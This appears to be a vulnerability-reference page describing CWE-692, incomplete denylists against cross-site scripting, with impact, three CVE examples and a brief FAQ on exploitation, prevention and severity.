Description
The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.
While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The "XSS Cheat Sheet" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists.
Potential Impact
Confidentiality, Integrity, Availability
Execute Unauthorized Code or Commands
Real-World CVE Examples
| CVE ID | Description |
|---|---|
| CVE-2007-5727 | Denylist only removes <SCRIPT> tag. |
| CVE-2006-3617 | Denylist only removes <SCRIPT> tag. |
| CVE-2006-4308 | Denylist only checks "javascript:" tag |
Related Weaknesses
Frequently Asked Questions
What is CWE-692?
CWE-692 (Incomplete Denylist to Cross-Site Scripting) is a software weakness identified by MITRE's Common Weakness Enumeration. It is classified as a Compound-level weakness. The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.
How can CWE-692 be exploited?
Attackers can exploit CWE-692 (Incomplete Denylist to Cross-Site Scripting) to execute unauthorized code or commands. This weakness is typically introduced during the Implementation phase of software development.
How do I prevent CWE-692?
Follow secure coding practices, conduct code reviews, and use automated security testing tools (SAST/DAST) to detect this weakness early in the development lifecycle.
What is the severity of CWE-692?
CWE-692 is classified as a Compound-level weakness (Complex abstraction). It has been observed in 3 real-world CVEs.